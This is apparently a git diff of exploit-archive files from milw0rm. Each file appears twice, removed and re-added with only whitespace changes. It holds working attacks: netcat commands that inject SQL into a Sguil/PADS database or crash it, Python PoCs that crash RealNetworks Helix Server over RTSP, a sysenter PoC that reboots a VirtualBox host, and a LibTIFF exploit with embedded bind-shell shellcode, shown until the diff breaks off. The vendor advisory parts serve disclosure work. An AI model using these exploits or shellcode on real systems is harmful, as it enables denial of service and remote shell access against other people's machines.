Since snort is the de-facto standard NIDS, sguil is found in a lot -of places where there are mission-critical NIDS, making this a potent -vulnerability. The idea here is to craft a special packet containing a SQL -statement and send it across the wire, such that the sguil-agents will pick up -on it. We will exploit the Passive Asset Detection System (PADS) -> sguil -relationship, which will be monitoring for said banner packets. Thanks to the -availability of the netcat program, there is also no need for any programming -skill. Also, the attack can run on any port, so even an unprivileged user -could potentially run this attack. - -Without further ado, here's the good stuff: - -TO CRASH THE SERVER: -from a box that has its traffic monitored, run -echo “SSH-2.0-OpenSSH_1.4′,’deadbeefcafe’);–” | nc -l 7777 -...and then telnet to port 7777 from another box. There will be a syntax -error in the sguil management daemon's SQL insert statement, and it will -crash rather ungracefully. This is highly noticable, so be careful! - -TO INJECT DATA SILENTLY: -from a box that has its traffic monitored, run -echo “SSH-2.0-OpenSSH_1.4′,’deadbeefcafe’)–” | nc -l 8888 -...and then telnet to port 8888 from another box. The difference here is the -semicolon in the statement. This will insert an asset into the SQL database as -ssh version 1.4, protocol 2.0. 
Obviously, you can have some fun with this ;-) - -PROOF OF CONCEPT: -mysql> use sguildb; -Reading table information for completion of table and column names -You can turn off this feature to get a quicker startup with -A - -Database changed -mysql> select * from pads where `hex_payload`=’deadbeefcafe’; -+————–+—–+———-+———————+————+———+——+———-+————-+————–+ -| hostname | sid | asset_id | timestamp | ip | service | port | ip_proto | application | hex_payload | -+————–+—–+———-+———————+————+———+——+———-+————-+————–+ -| [REMOVED] | 1 | 7 | 2009-06-08 14:28:02 | [REMOVED] | ssh | 1061 | 6 | OpenSSH 1.4 | deadbeefcafe | -+————–+—–+———-+———————+————+———+——+———-+————-+————–+ -1 row in set (0.01 sec) - - -Note that you don't even need to put in legit hex into the attack for it to work. Bonus points -if you put in a hexadecimal message to the sysadmin that doesn't even contain legit hex. - -# milw0rm.com [2009-07-17] +Sguil/PADS Denial of Service exploit +by Ataraxia (Benjamin Rose) +Public announcement made 7/15/09. + +Please visit http://allmybase.com/ (my blog) for more up-to-date +information, and a quick patch. + +More in-depth article available at: http://allmybase.com/?p=72 + +This more in-depth article does include additional details and +the actual code that is being exploited, if you're interested... + +########################################################################## +UPDATE 7/17/09 @ 14:41: +In speaking with the creators of the sguil software, it seems that +I have greatly overestimated the reach of this bug. I had assumed that +it would be possible to run multiple SQL commands within a single TCL +mysqlexec() statement, an assumption that now seems incorrect. This means +that, at best, this hole becomes a denial of service attack that could +inject incorrect data into the sguil database, and/or kill the sguil +daemon, a noisy operation. My apologies for this initial overzealousness. 
+########################################################################## + +ORIGINAL POST, UNMODIFIED: +This exploit has the ability to render any Intrusion Detection +System utilizing the sguil monitoring useless. At the lowest level, +you can kill the master logging daemon that collates the data into +a MySQL database. I've also been able to inject random and useless +data into the MySQL database, which opens the door for an obfuscation +of an attack, or a flat-out denial of service attack. There also exists +the possibility of dropping the database altogether, though I was not +able to make this happen during my preliminary testing of the attack. + +The sguil sensor boxes report back to a sguil daemon on a management server, +which in turn puts the data received into a MySQL database. The sensor +collects data from many sensor agents, the most popular ones including snort +and sancp. Since snort is the de-facto standard NIDS, sguil is found in a lot +of places where there are mission-critical NIDS, making this a potent +vulnerability. The idea here is to craft a special packet containing a SQL +statement and send it across the wire, such that the sguil-agents will pick up +on it. We will exploit the Passive Asset Detection System (PADS) -> sguil +relationship, which will be monitoring for said banner packets. Thanks to the +availability of the netcat program, there is also no need for any programming +skill. Also, the attack can run on any port, so even an unprivileged user +could potentially run this attack. + +Without further ado, here's the good stuff: + +TO CRASH THE SERVER: +from a box that has its traffic monitored, run +echo “SSH-2.0-OpenSSH_1.4′,’deadbeefcafe’);–” | nc -l 7777 +...and then telnet to port 7777 from another box. There will be a syntax +error in the sguil management daemon's SQL insert statement, and it will +crash rather ungracefully. This is highly noticable, so be careful! 
+ +TO INJECT DATA SILENTLY: +from a box that has its traffic monitored, run +echo “SSH-2.0-OpenSSH_1.4′,’deadbeefcafe’)–” | nc -l 8888 +...and then telnet to port 8888 from another box. The difference here is the +semicolon in the statement. This will insert an asset into the SQL database as +ssh version 1.4, protocol 2.0. Obviously, you can have some fun with this ;-) + +PROOF OF CONCEPT: +mysql> use sguildb; +Reading table information for completion of table and column names +You can turn off this feature to get a quicker startup with -A + +Database changed +mysql> select * from pads where `hex_payload`=’deadbeefcafe’; ++————–+—–+———-+———————+————+———+——+———-+————-+————–+ +| hostname | sid | asset_id | timestamp | ip | service | port | ip_proto | application | hex_payload | ++————–+—–+———-+———————+————+———+——+———-+————-+————–+ +| [REMOVED] | 1 | 7 | 2009-06-08 14:28:02 | [REMOVED] | ssh | 1061 | 6 | OpenSSH 1.4 | deadbeefcafe | ++————–+—–+———-+———————+————+———+——+———-+————-+————–+ +1 row in set (0.01 sec) + + +Note that you don't even need to put in legit hex into the attack for it to work. Bonus points +if you put in a hexadecimal message to the sysadmin that doesn't even contain legit hex. + +# milw0rm.com [2009-07-17] diff --git a/platforms/multiple/dos/9198.txt b/platforms/multiple/dos/9198.txt index 40d82c422..5861a9b01 100755 --- a/platforms/multiple/dos/9198.txt +++ b/platforms/multiple/dos/9198.txt 
@@ -1,323 +1,323 @@ ------BEGIN PGP SIGNED MESSAGE----- -Hash: SHA1 - - Core Security Technologies - CoreLabs Advisory - http://www.coresecurity.com/corelabs/ - -Real Helix DNA RTSP and SETUP request handler vulnerabilities - - -1. *Advisory Information* - -Title: Real Helix DNA RTSP and SETUP request handler vulnerabilities -Advisory ID: CORE-2009-0227 -Advisory URL: http://www.coresecurity.com/content/real-helix-dna -Date published: 2009-07-17 -Date of last update: 2009-07-17 -Vendors contacted: RealNetworks -Release mode: Forced release - - -2. *Vulnerability Information* - -Class: Denial of service (DoS) -Remotely Exploitable: Yes -Locally Exploitable: No -Bugtraq ID: N/A -CVE Name: CVE-2009-2533, CVE-2009-2534 - - -3. *Vulnerability Description* - -Helix Server is a multi-format cross-platform streaming server. Two -vulnerabilities have been found, that could allow a remote attacker to -crash the Helix Server. - -During a 'RTSP' (SET_PARAMETERS) request handling, if an empty -'DataConvertBuffer' parameter is received by the server, it will raise -an exception reading an invalid direction of memory. This exception is -usually handled correctly but if you send this malformed request -multiple times in a short period of time, it could render the Helix -Server unresponsive and terminate its execution. - -During the 'SETUP' request handling, a 0x2F character is searched in the -request line, if this byte is absent the process crashes with an access -violation. - - -4. *Vulnerable packages* - - . Helix Server Version 12.x - . Helix Mobile Server Version 12.x - . The vulnerabilities were investigated on Helix Server Version -12.0.1.215 (Tahiti) Build 175002/12667 - - -5. *Non-vulnerable packages* - - . Helix Server Version 13.0.0 - . Helix Mobile Server Version 13.0.0 - - -6. 
*Vendor Information, Solutions and Workarounds* - -According to the Security Update 071409HS [2] published by RealNetworks: -"The vulnerability is resolved on the following platforms by installing -Version 13.0.0 of the Helix Server and the Helix Mobile Server. This -only pertains to supported versions of the platforms listed below. The -updated version will be available on your RealNetworks PAM site after -12:00 am PST, on July 14, 2009." - - . Red Hat Enterprise Linux 4 - . Red Hat Enterprise Linux 5 - . Sun Solaris 10 - . Windows 2003 - - -7. *Credits* - -These vulnerabilities were discovered and researched by Damian Frizza -from Core Security Technologies. - - -8. *Technical Description / Proof of Concept Code* - - -8.1. *RTSP request handling Denial of Service (CVE-2009-2533)* - -The problem arises when the 'rmserver' process receives an 'RTSP -(SET_PARAMETER)' request with no content in the 'DataConvertBuffer' -parameter. The handling code reads at the memory location zero (0) and -triggers an exception, which is handled correctly. However sending this -malformed request multiple times renders the rmserver process -unresponsive and subsequently stops its execution. - -The code section which triggers the exception is: - -/----------- - -00458066 |. C745 08 00000000 MOV DWORD PTR SS:[EBP+8],0 -*Sets the content of the local variable to 0 -0045806D |. 8B10 MOV EDX,DWORD PTR DS:[EAX] -0045806F |. 50 PUSH EAX -00458070 |. FF52 2C CALL DWORD PTR DS:[EDX+2C] -00458073 |. 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] -00458076 |. 
8B10 MOV EDX,DWORD PTR DS:[EAX] * -Tries to read form 0 memory location - -- -----------/ - - The following PoC code reproduces the issue: - -/----------- - -import socket - -s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) -s.connect(('172.16.132.133',554)) - -setRequest = "SET_PARAMETER / RTSP/1.0\r\n" -setRequest +="DataConvertBuffer: \r\n\r\n" - -for i in range(5): - print i - s.send(setRequest) - -s.close() - -- -----------/ - - - -The following output is written in the log file: - -/----------- - -4068: FATAL ERROR: The server has run out of memory! -FATAL ERROR: Last request was rounded up to 1155072 bytes -Trace: -0x00409C96 -... -... -... -0x00000000 -FATAL ERROR: Server Terminated - -- -----------/ - - -8.2. *Malformed SETUP command handling Denial of Service (CVE-2009-2534)* - -The problem arises when the 'SETUP' request is handled and the byte 0x2F -is absent in the request line. While handling this kind of malformed -request the server crashes with an access violation. - -The code section which triggers the access violation is: - -/----------- - -0047A490 |. 6A 2F PUSH 2F -0047A492 |. 56 PUSH ESI -0047A493 |. FF15 08425100 CALL DWORD PTR DS:[<&MSVCR71.strchr>] - ; MSVCR71.strchr - -- -----------/ - - if only the "/" (0x2F) character is sent, the program tries to copy -from 0 and the access violation exception is raised. - -/----------- - -0047A490 |. 6A 2F PUSH 2F -0047A492 |. 56 PUSH ESI -0047A493 |. FF15 08425100 CALL DWORD PTR DS:[<&MSVCR71.strchr>] - ; MSVCR71.strchr - -- -----------/ - - The following code reproduces the issue: - -/----------- - -import socket - -s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) -s.connect(('172.16.132.133',554)) - -setRequest = "SETUP / RTSP/1.0\r\n\r\n" - -s.send(setRequest) -s.close() - -- -----------/ - - -9. *Report Timeline* - -. 2009-03-04: -Core Security Technologies notifies RealNetworks of the vulnerability. -Core initially schedules publication of its advisory to April 6th, 2009. - -. 
2009-03-16: -Core notifies again RealNetworks of the vulnerability. - -. 2009-03-16: -RealNetworks identifies the vulnerability alert as SPAM. - -. 2009-03-20: -The RealNetworks team asks Core for a technical description of the -vulnerability. - -. 2009-03-23: -Technical details sent to RealNetworks team by Core. RealNetworks -acknowledges reception. - -. 2009-03-30: -Core requests information about the plans of RealNetworks to fix the -vulnerabilities. - -. 2009-03-30: -RealNetworks responds that fixes will be included in the next public -release - currently targeted for July 2009. - -. 2009-05-04: -Core requests RealNetworks a technical analysis of the vulnerabilities, -a list of the affected versions of Helix Server, and a detailed timeline -for developing, testing and releasing fixes for these vulnerabilities. -It is only based on that information that Core can reevaluate its -advisory publication timeframe (which was originally scheduled to be -published on April 6). - -. 2009-05-05: -RealNetworks responds that fixes will be available in mid-2009, most -likely in the July time frame, and that to protect its customer base -RealNetworks will not provide additional details until the release is -publicly available. - -. 2009-05-05: -Core requests a more precise estimation for the release of fixes (no -reply received). - -. 2009-05-29: -Core requests again RealNetworks an estimated date for the release of -fixes, and technical details about the issues. In the meantime, the -publication of advisory CORE-2009-0227 is rescheduled for July 15th (no -reply received). - -. 2009-07-16: -An updated version of the advisory was sent to RealNetworks by Core. -Core requests again information about this issue. - -. 
2009-07-17: -Core is made aware that Real Networks has released the Security Update -071409HS [2] on July 14th, which states that version 13.0.0 of the Helix -Server and the Helix Mobile Server have been updated to ensure that the -above vulnerabilities have been resolved. - -. 2009-07-17: -The advisory CORE-2009-0227 is published by Core. - - - -10. *References* - -[1] RealNetworks -http://www.realnetworks.com/ -[2] RealNetworks Security Update 071409HS -http://docs.real.com/docs/security/SecurityUpdate071409HS.pdf - - -11. *About CoreLabs* - -CoreLabs, the research center of Core Security Technologies, is charged -with anticipating the future needs and requirements for information -security technologies. We conduct our research in several important -areas of computer security including system vulnerabilities, cyber -attack planning and simulation, source code auditing, and cryptography. -Our results include problem formalization, identification of -vulnerabilities, novel solutions and prototypes for new technologies. -CoreLabs regularly publishes security advisories, technical papers, -project information and shared software tools for public use at: -http://www.coresecurity.com/corelabs. - - -12. *About Core Security Technologies* - -Core Security Technologies develops strategic solutions that help -security-conscious organizations worldwide develop and maintain a -proactive process for securing their networks. The company's flagship -product, CORE IMPACT, is the most comprehensive product for performing -enterprise security assurance testing. CORE IMPACT evaluates network, -endpoint and end-user vulnerabilities and identifies what resources are -exposed. It enables organizations to determine if current security -investments are detecting and preventing attacks. Core Security -Technologies augments its leading technology solution with world-class -security consulting services, including penetration testing and software -security auditing. 
Based in Boston, MA and Buenos Aires, Argentina, Core -Security Technologies can be reached at 617-399-6980 or on the Web at -http://www.coresecurity.com. - - -13. *Disclaimer* - -The contents of this advisory are copyright (c) 2009 Core Security -Technologies and (c) 2009 CoreLabs, and may be distributed freely -provided that no fee is charged for this distribution and proper credit -is given. - - -14. *PGP/GPG Keys* - -This advisory has been signed with the GPG key of Core Security -Technologies advisories team, which is available for download at -http://www.coresecurity.com/files/attachments/core_security_advisories.asc. ------BEGIN PGP SIGNATURE----- -Version: GnuPG v1.4.8 (MingW32) -Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org - -iEYEARECAAYFAkpg7eMACgkQyNibggitWa38bgCeNFBQ02cGJvhhtc8eYMaEa9VH -UHMAn3Ngc4GBXkyfSe+hkgJWYtQ13Vjh -=9iPO ------END PGP SIGNATURE----- - -# milw0rm.com [2009-07-17] +-----BEGIN PGP SIGNED MESSAGE----- +Hash: SHA1 + + Core Security Technologies - CoreLabs Advisory + http://www.coresecurity.com/corelabs/ + +Real Helix DNA RTSP and SETUP request handler vulnerabilities + + +1. *Advisory Information* + +Title: Real Helix DNA RTSP and SETUP request handler vulnerabilities +Advisory ID: CORE-2009-0227 +Advisory URL: http://www.coresecurity.com/content/real-helix-dna +Date published: 2009-07-17 +Date of last update: 2009-07-17 +Vendors contacted: RealNetworks +Release mode: Forced release + + +2. *Vulnerability Information* + +Class: Denial of service (DoS) +Remotely Exploitable: Yes +Locally Exploitable: No +Bugtraq ID: N/A +CVE Name: CVE-2009-2533, CVE-2009-2534 + + +3. *Vulnerability Description* + +Helix Server is a multi-format cross-platform streaming server. Two +vulnerabilities have been found, that could allow a remote attacker to +crash the Helix Server. 
+ +During a 'RTSP' (SET_PARAMETERS) request handling, if an empty +'DataConvertBuffer' parameter is received by the server, it will raise +an exception reading an invalid direction of memory. This exception is +usually handled correctly but if you send this malformed request +multiple times in a short period of time, it could render the Helix +Server unresponsive and terminate its execution. + +During the 'SETUP' request handling, a 0x2F character is searched in the +request line, if this byte is absent the process crashes with an access +violation. + + +4. *Vulnerable packages* + + . Helix Server Version 12.x + . Helix Mobile Server Version 12.x + . The vulnerabilities were investigated on Helix Server Version +12.0.1.215 (Tahiti) Build 175002/12667 + + +5. *Non-vulnerable packages* + + . Helix Server Version 13.0.0 + . Helix Mobile Server Version 13.0.0 + + +6. *Vendor Information, Solutions and Workarounds* + +According to the Security Update 071409HS [2] published by RealNetworks: +"The vulnerability is resolved on the following platforms by installing +Version 13.0.0 of the Helix Server and the Helix Mobile Server. This +only pertains to supported versions of the platforms listed below. The +updated version will be available on your RealNetworks PAM site after +12:00 am PST, on July 14, 2009." + + . Red Hat Enterprise Linux 4 + . Red Hat Enterprise Linux 5 + . Sun Solaris 10 + . Windows 2003 + + +7. *Credits* + +These vulnerabilities were discovered and researched by Damian Frizza +from Core Security Technologies. + + +8. *Technical Description / Proof of Concept Code* + + +8.1. *RTSP request handling Denial of Service (CVE-2009-2533)* + +The problem arises when the 'rmserver' process receives an 'RTSP +(SET_PARAMETER)' request with no content in the 'DataConvertBuffer' +parameter. The handling code reads at the memory location zero (0) and +triggers an exception, which is handled correctly. 
However sending this +malformed request multiple times renders the rmserver process +unresponsive and subsequently stops its execution. + +The code section which triggers the exception is: + +/----------- + +00458066 |. C745 08 00000000 MOV DWORD PTR SS:[EBP+8],0 +*Sets the content of the local variable to 0 +0045806D |. 8B10 MOV EDX,DWORD PTR DS:[EAX] +0045806F |. 50 PUSH EAX +00458070 |. FF52 2C CALL DWORD PTR DS:[EDX+2C] +00458073 |. 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] +00458076 |. 8B10 MOV EDX,DWORD PTR DS:[EAX] * +Tries to read form 0 memory location + +- -----------/ + + The following PoC code reproduces the issue: + +/----------- + +import socket + +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +s.connect(('172.16.132.133',554)) + +setRequest = "SET_PARAMETER / RTSP/1.0\r\n" +setRequest +="DataConvertBuffer: \r\n\r\n" + +for i in range(5): + print i + s.send(setRequest) + +s.close() + +- -----------/ + + + +The following output is written in the log file: + +/----------- + +4068: FATAL ERROR: The server has run out of memory! +FATAL ERROR: Last request was rounded up to 1155072 bytes +Trace: +0x00409C96 +... +... +... +0x00000000 +FATAL ERROR: Server Terminated + +- -----------/ + + +8.2. *Malformed SETUP command handling Denial of Service (CVE-2009-2534)* + +The problem arises when the 'SETUP' request is handled and the byte 0x2F +is absent in the request line. While handling this kind of malformed +request the server crashes with an access violation. + +The code section which triggers the access violation is: + +/----------- + +0047A490 |. 6A 2F PUSH 2F +0047A492 |. 56 PUSH ESI +0047A493 |. FF15 08425100 CALL DWORD PTR DS:[<&MSVCR71.strchr>] + ; MSVCR71.strchr + +- -----------/ + + if only the "/" (0x2F) character is sent, the program tries to copy +from 0 and the access violation exception is raised. + +/----------- + +0047A490 |. 6A 2F PUSH 2F +0047A492 |. 56 PUSH ESI +0047A493 |. 
FF15 08425100 CALL DWORD PTR DS:[<&MSVCR71.strchr>] + ; MSVCR71.strchr + +- -----------/ + + The following code reproduces the issue: + +/----------- + +import socket + +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +s.connect(('172.16.132.133',554)) + +setRequest = "SETUP / RTSP/1.0\r\n\r\n" + +s.send(setRequest) +s.close() + +- -----------/ + + +9. *Report Timeline* + +. 2009-03-04: +Core Security Technologies notifies RealNetworks of the vulnerability. +Core initially schedules publication of its advisory to April 6th, 2009. + +. 2009-03-16: +Core notifies again RealNetworks of the vulnerability. + +. 2009-03-16: +RealNetworks identifies the vulnerability alert as SPAM. + +. 2009-03-20: +The RealNetworks team asks Core for a technical description of the +vulnerability. + +. 2009-03-23: +Technical details sent to RealNetworks team by Core. RealNetworks +acknowledges reception. + +. 2009-03-30: +Core requests information about the plans of RealNetworks to fix the +vulnerabilities. + +. 2009-03-30: +RealNetworks responds that fixes will be included in the next public +release - currently targeted for July 2009. + +. 2009-05-04: +Core requests RealNetworks a technical analysis of the vulnerabilities, +a list of the affected versions of Helix Server, and a detailed timeline +for developing, testing and releasing fixes for these vulnerabilities. +It is only based on that information that Core can reevaluate its +advisory publication timeframe (which was originally scheduled to be +published on April 6). + +. 2009-05-05: +RealNetworks responds that fixes will be available in mid-2009, most +likely in the July time frame, and that to protect its customer base +RealNetworks will not provide additional details until the release is +publicly available. + +. 2009-05-05: +Core requests a more precise estimation for the release of fixes (no +reply received). + +. 
2009-05-29: +Core requests again RealNetworks an estimated date for the release of +fixes, and technical details about the issues. In the meantime, the +publication of advisory CORE-2009-0227 is rescheduled for July 15th (no +reply received). + +. 2009-07-16: +An updated version of the advisory was sent to RealNetworks by Core. +Core requests again information about this issue. + +. 2009-07-17: +Core is made aware that Real Networks has released the Security Update +071409HS [2] on July 14th, which states that version 13.0.0 of the Helix +Server and the Helix Mobile Server have been updated to ensure that the +above vulnerabilities have been resolved. + +. 2009-07-17: +The advisory CORE-2009-0227 is published by Core. + + + +10. *References* + +[1] RealNetworks +http://www.realnetworks.com/ +[2] RealNetworks Security Update 071409HS +http://docs.real.com/docs/security/SecurityUpdate071409HS.pdf + + +11. *About CoreLabs* + +CoreLabs, the research center of Core Security Technologies, is charged +with anticipating the future needs and requirements for information +security technologies. We conduct our research in several important +areas of computer security including system vulnerabilities, cyber +attack planning and simulation, source code auditing, and cryptography. +Our results include problem formalization, identification of +vulnerabilities, novel solutions and prototypes for new technologies. +CoreLabs regularly publishes security advisories, technical papers, +project information and shared software tools for public use at: +http://www.coresecurity.com/corelabs. + + +12. *About Core Security Technologies* + +Core Security Technologies develops strategic solutions that help +security-conscious organizations worldwide develop and maintain a +proactive process for securing their networks. The company's flagship +product, CORE IMPACT, is the most comprehensive product for performing +enterprise security assurance testing. 
CORE IMPACT evaluates network, +endpoint and end-user vulnerabilities and identifies what resources are +exposed. It enables organizations to determine if current security +investments are detecting and preventing attacks. Core Security +Technologies augments its leading technology solution with world-class +security consulting services, including penetration testing and software +security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core +Security Technologies can be reached at 617-399-6980 or on the Web at +http://www.coresecurity.com. + + +13. *Disclaimer* + +The contents of this advisory are copyright (c) 2009 Core Security +Technologies and (c) 2009 CoreLabs, and may be distributed freely +provided that no fee is charged for this distribution and proper credit +is given. + + +14. *PGP/GPG Keys* + +This advisory has been signed with the GPG key of Core Security +Technologies advisories team, which is available for download at +http://www.coresecurity.com/files/attachments/core_security_advisories.asc. +-----BEGIN PGP SIGNATURE----- +Version: GnuPG v1.4.8 (MingW32) +Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org + +iEYEARECAAYFAkpg7eMACgkQyNibggitWa38bgCeNFBQ02cGJvhhtc8eYMaEa9VH +UHMAn3Ngc4GBXkyfSe+hkgJWYtQ13Vjh +=9iPO +-----END PGP SIGNATURE----- + +# milw0rm.com [2009-07-17] diff --git a/platforms/multiple/dos/9323.txt b/platforms/multiple/dos/9323.txt index 9a30cacb7..8d4f4201e 100755 --- a/platforms/multiple/dos/9323.txt +++ b/platforms/multiple/dos/9323.txt 
@@ -1,34 +1,34 @@
-Sun's VirtualBox host reboot PoC
-by Tadas Vilkeliskis
-Disclosure made at 2009-08-01
-
-VULNERABILITY INFORMATION
-
-Remotely exploitable: no
-Locally exploitable: yes
-Affected versions: 2.2 - 3.0.2 r49928 for Linux
-
-VULNERABILITY DESCRIPTION
-
-VirtualBox VM is unable to handle fast call to privilege level 0 system
-procedures (sysenter). If sysenter instruction is executed on the guest
-OS the host machine will reboot. The technique was tested on the
-following guest OS: Windows XP, Windows 7 RC, Ubuntu 9.04. It is not
-clear whether it is possible to execute arbitrary code on the host,
-however this trick can be successfully used by malware as an anti-vm
-trick.
-
-POC
-
-; nasm -f elf vmhostreboot.asm
-; gcc vmhostreboot.o -o vmhostreboot
-
-BITS 32
-SECTION .text
-GLOBAL main
-
-main:
- sysenter
- ret
-
-# milw0rm.com [2009-08-01]
+Sun's VirtualBox host reboot PoC
+by Tadas Vilkeliskis
+Disclosure made at 2009-08-01
+
+VULNERABILITY INFORMATION
+
+Remotely exploitable: no
+Locally exploitable: yes
+Affected versions: 2.2 - 3.0.2 r49928 for Linux
+
+VULNERABILITY DESCRIPTION
+
+VirtualBox VM is unable to handle fast call to privilege level 0 system
+procedures (sysenter). If sysenter instruction is executed on the guest
+OS the host machine will reboot. The technique was tested on the
+following guest OS: Windows XP, Windows 7 RC, Ubuntu 9.04. It is not
+clear whether it is possible to execute arbitrary code on the host,
+however this trick can be successfully used by malware as an anti-vm
+trick.
+
+POC
+
+; nasm -f elf vmhostreboot.asm
+; gcc vmhostreboot.o -o vmhostreboot
+
+BITS 32
+SECTION .text
+GLOBAL main
+
+main:
+ sysenter
+ ret
+
+# milw0rm.com [2009-08-01]
diff --git a/platforms/multiple/dos/946.c b/platforms/multiple/dos/946.c
index 5e1aabbec..7ad57d373 100755
--- a/platforms/multiple/dos/946.c
+++ b/platforms/multiple/dos/946.c
@@ -151,6 +151,6 @@ strcat(str,temp); return 0; }
-
-
-// milw0rm.com [2005-04-19]
+
+
+// milw0rm.com [2005-04-19]
diff --git a/platforms/multiple/dos/956.c b/platforms/multiple/dos/956.c
index 2eb952513..848bce156 100755
--- a/platforms/multiple/dos/956.c
+++ b/platforms/multiple/dos/956.c
@@ -251,6 +251,6 @@ void printe(char *err,signed char e){
 printf("[!] %s\n",err);
 if(e)exit(e);
 return;
-}
-
-// milw0rm.com [2005-04-26]
+}
+
+// milw0rm.com [2005-04-26]
diff --git a/platforms/multiple/dos/984.c b/platforms/multiple/dos/984.c
index 1fbccb445..4c5121b63 100755
--- a/platforms/multiple/dos/984.c
+++ b/platforms/multiple/dos/984.c
@@ -256,6 +256,6 @@ void printe(char *err,signed char e){
 printf("[!] %s\n",err);
 if(e)exit(e);
 return;
-}
-
-// milw0rm.com [2005-05-07]
+}
+
+// milw0rm.com [2005-05-07]
diff --git a/platforms/multiple/local/1119.txt b/platforms/multiple/local/1119.txt
index 7a435ed63..7921804b2 100755
--- a/platforms/multiple/local/1119.txt
+++ b/platforms/multiple/local/1119.txt
@@ -12,6 +12,6 @@ Have fun making your own commands. The advisory can be found at: http://www.guninski.com/where_do_you_want_billg_to_go_today_5.html
-/str0ke
-
-# milw0rm.com [2005-07-25]
+/str0ke
+
+# milw0rm.com [2005-07-25]
diff --git a/platforms/multiple/local/1554.c b/platforms/multiple/local/1554.c
index 58b84d868..b455dd0b4 100755
--- a/platforms/multiple/local/1554.c
+++ b/platforms/multiple/local/1554.c
@@ -1,135 +1,135 @@
-/*
- LibTIFF exploit
- Tested on LibTIFF 3.7.1
- Coded by Agustin Gianni (agustingianni at gmail.com) and Samelat
-
- Blog: http://gruba.blogspot.com
-
- In other versions and/or Linux distributions you might need to
- adjust some offsets.
-
- gr00vy@kenny:/home/gr00vy/EXPLOIT$ make libtiff_exploit
- cc libtiff_exploit.c -o libtiff_exploit
- gr00vy@kenny:/home/gr00vy/EXPLOIT$ ./libtiff_exploit /usr/local/bin/tiffinfo evil.tiff
- Using RET: 0xbfffffb4
- TIFFReadDirectory:
- Warning, evil.tiff: unknown field with tag 260 (0x104) encountered.
- evil.tiff:
- Warning, incorrect count for field "PhotometricInterpretation" (150341633, expecting 1); tag trimmed.
- evil.tiff:
- Warning, incorrect count for field "BitsPerSample" (257, expecting 1); tag trimmed.
- sh-3.00$
-
- gr00vy@kenny:/home/gr00vy/storage/Exploits/Libtiff-3.7.1$ ./libtiff_exploit
- /usr/kde/3.3/bin/konqueror evil.tiff
- Linux Enabled
- Using RET: 0xbfffffb1
- konqueror: ERROR: Error in BrowserExtension::actionSlotMap(), unknown action : searchProvider
- konqueror: ERROR: Error in BrowserExtension::actionSlotMap(), unknown action : searchProvider
- TIFFReadDirectory: Warning, : unknown field with tag 260 (0x104) encountered.
- : Warning, incorrect count for field "PhotometricInterpretation" (150341633, expecting 1);
- tag
- trimmed.
- : Warning, incorrect count for field "BitsPerSample" (257, expecting 1); tag trimmed.
- sh-3.00$ exit
- exit
-
- Heheh it also works like a remote exploit i would leave that work (easy work) for the
- "interested" people.
-
-*/
-
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-
-#define OFFSET 0x3F /* return address offset */
-#define SHELL_OFFSET 0x0102 /* shellcode address offset */
-#define DISPLAY "DISPLAY=:0.0" /* no comments ... */
-#define HOMEDIR "HOME=/tmp/"
-
-int
-main(int argc, char **argv, char **env)
-{
- /* Linux shellcode that binds a shell on port 4369 */
-char linux_bind[] = "\x31\xc0\x50\x40\x50\x40\x50\xb0\x66\x31"
- "\xdb\x43\x89\xe1\xcd\x80\x99\x52\x52\x52"
- "\xba\x02\x01\x11\x11\xfe\xce\x52\x89\xe2"
- "\x31\xc9\xb1\x10\x51\x52\x50\x89\xc2\x89"
- "\xe1\xb0\x66\xb3\x02\x89\xe1\xcd\x80\xb0"
- "\x66\xb3\x04\x53\x52\x89\xe1\xcd\x80\x31"
- "\xc0\x50\x50\x52\x89\xe1\xb0\x66\xb3\x05"
- "\xcd\x80\x89\xc3\x31\xc9\xb1\x03\xb0\x3f"
- "\x49\xcd\x80\x41\xe2\xf8\x51\x68\x6e\x2f"
- "\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x51"
- "\x53\x89\xe1\x99\xb0\x0b\xcd\x80";
-
- /* (?) lies lies lies lies!*/
- #ifdef FREEBSD
- printf("FreeBSD Enabled\n");
- char shellcode[]=
- "\xeb\x0e\x5e\x31\xc0\x88\x46\x07\x50\x50\x56\xb0\x3b\x50\xcd"
- "\x80\xe8\xed\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23";
-
- #else
- printf("Linux Enabled\n");
- char shellcode[] =
- "\xeb\x20\x5e\x89\x76\x08\x31\xc0\x89\x46\x0c"
- "\x88\x46\x07\x8d\x56\x0c\x8d\x4e\x08\x89\xf3"
- "\x31\xc0\xb0\x0b\xcd\x80\x31\xdb\xb0\x01\xcd"
- "\x80\xe8\xdb\xff\xff\xff\x2f\x62\x69\x6e\x2f"
- "\x73\x68\x23";
-
- #endif
-
- if(argc < 3)
- {
- fprintf(stderr, "Error, arguments are like these\n"
- "%s \n", argv[0]);
- return -1;
- }
-
- char *envp[] = {HOMEDIR, DISPLAY, shellcode, NULL};
-
- /* argv[1] -> executable file that is linked with vuln tiff library */
- long ret = 0xc0000000 - sizeof(void *) - strlen(argv[1]) - strlen(shellcode) - 0x02;
-
- int fd = open(argv[2], O_RDWR);
- if(fd == -1)
- {
- perror("open()");
- return -1;
- }
-
- if(lseek(fd, OFFSET, SEEK_SET) == -1)
- {
- perror("lseek()");
- close(fd);
- return -1;
- }
-
- if(write(fd, (void *) &ret, sizeof(long)) < sizeof(long))
- {
- perror("write()");
- close(fd);
- return -1;
- }
-
- close(fd);
-
- fprintf(stdout, "Using RET: 0x%.8x\n", (unsigned int) ret);
-
- if(execle(argv[1], "tiff", argv[2], NULL, envp) == -1)
- {
- perror("execve()");
- return -1;
- }
-
- return 0;
-}
-
-// milw0rm.com [2006-03-05]
+/*
+ LibTIFF exploit
+ Tested on LibTIFF 3.7.1
+ Coded by Agustin Gianni (agustingianni at gmail.com) and Samelat
+
+ Blog: http://gruba.blogspot.com
+
+ In other versions and/or Linux distributions you might need to
+ adjust some offsets.
+
+ gr00vy@kenny:/home/gr00vy/EXPLOIT$ make libtiff_exploit
+ cc libtiff_exploit.c -o libtiff_exploit
